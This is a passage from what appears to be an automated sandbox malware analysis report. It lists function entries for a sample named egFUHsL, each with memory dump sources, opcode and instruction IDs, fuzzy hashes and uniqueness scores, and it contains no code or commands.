                                                                                        • Source File: 00000016.00000002.718445263.00000000006D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 006D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_22_2_6d0000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        • Opcode ID: 89b4ae5a698d49cf5ddf34b5c1ee9f47c964eb11a926c6ed65b361b25db20517
                                                                                        • Instruction ID: cd9e04dc518f4688f2e55a3fb279fe8eef81d3114beb8fc14b4138f28f45b9d3
                                                                                        • Opcode Fuzzy Hash: 89b4ae5a698d49cf5ddf34b5c1ee9f47c964eb11a926c6ed65b361b25db20517
                                                                                        • Instruction Fuzzy Hash: 7021E575D002099FDB14CF99D848BEEBBF5EB88310F14842AE415A7350C774AA44CFA1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000FD01C Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000016.00000002.717906488.00000000000FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_22_2_fd000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e14ea62275c22522f34dda46d5bfc58c42998fd54d004efcff71eca49435c99e
                                                                                        • Instruction ID: 0e80bd7c6838aa29339f33e09809723bbe3be3206369c1a55e7ab307fe20af3e
                                                                                        • Opcode Fuzzy Hash: e14ea62275c22522f34dda46d5bfc58c42998fd54d004efcff71eca49435c99e
                                                                                        • Instruction Fuzzy Hash: 7C213770604344DFDB14CF10D8C4B2ABBA2EB84314F34C56ADA094B646CB3AD807DB61
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000FD394 Relevance: .1, Instructions: 72COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000016.00000002.717906488.00000000000FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_22_2_fd000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 20909cfab822d8379aded77a76cbcaae5d214c4fe00b4e299515794669e558bf
                                                                                        • Instruction ID: 0b513574184d3a48540b83b6f48cb16bb03fee9e720bb20981a84c0b4f2ae481
                                                                                        • Opcode Fuzzy Hash: 20909cfab822d8379aded77a76cbcaae5d214c4fe00b4e299515794669e558bf
                                                                                        • Instruction Fuzzy Hash: B2210775604344EFDB14CF10D8C4B26BBA6FB84714F34C56ADA494B642C336E846EB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000FD38F Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000016.00000002.717906488.00000000000FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_22_2_fd000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea9aa13de3af6688b0190c548424d43cac2c886abfbda61e17135b2a085f984b
                                                                                        • Instruction ID: 4ef4a19661168dd1b23185c5ce267ac794683c8f7e55e7da5ba915ea9fa97751
                                                                                        • Opcode Fuzzy Hash: ea9aa13de3af6688b0190c548424d43cac2c886abfbda61e17135b2a085f984b
                                                                                        • Instruction Fuzzy Hash: 8A11BB75504284DFDB01CF10D5C4B25FFA2FB85314F24C6AAD9494BA52C33AE84ADFA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000FD017 Relevance: .1, Instructions: 53COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000016.00000002.717906488.00000000000FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000FD000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_22_2_fd000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ea9aa13de3af6688b0190c548424d43cac2c886abfbda61e17135b2a085f984b
                                                                                        • Instruction ID: a0133c029bc117fb633debd7d34e305378994615c0ddc9b0efe1d34d6b0b4821
                                                                                        • Opcode Fuzzy Hash: ea9aa13de3af6688b0190c548424d43cac2c886abfbda61e17135b2a085f984b
                                                                                        • Instruction Fuzzy Hash: C311DD75504284CFDB11CF10D5C4B25FFA2FB84314F24C6AAD9094BA56C33AD84ACFA2
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000ED849 Relevance: .0, Instructions: 45COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000016.00000002.717872156.00000000000ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 000ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_22_2_ed000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e481907946f3fe8f28e4dafd77906a88cc6223a0a8bf7401cd8f74a13f701572
                                                                                        • Instruction ID: 8eb2b1fda2a41abf586f15980f2b9020f91cdbe41078e650a5313c1bb908e7d5
                                                                                        • Opcode Fuzzy Hash: e481907946f3fe8f28e4dafd77906a88cc6223a0a8bf7401cd8f74a13f701572
                                                                                        • Instruction Fuzzy Hash: 2601F270108380EEF7249A17CD84B6ABBD8DF81764F28C51BEC482F282C739D840DAB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 000ED848 Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000016.00000002.717872156.00000000000ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 000ED000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_22_2_ed000_egFUHsL.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ba3178753fcaef6df4c57211a4adca1fe5fbd0bbdbd3048802f10b27e8a72e08
                                                                                        • Instruction ID: 889da4647fe32b1dec4648a16b112084a5b32e29b8487a37d214825d4d9436fe
                                                                                        • Opcode Fuzzy Hash: ba3178753fcaef6df4c57211a4adca1fe5fbd0bbdbd3048802f10b27e8a72e08
                                                                                        • Instruction Fuzzy Hash: F1F06271504284AEEB608A16DDC4B66FFD8EF91734F28C55BED485B282C3799C44CAB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%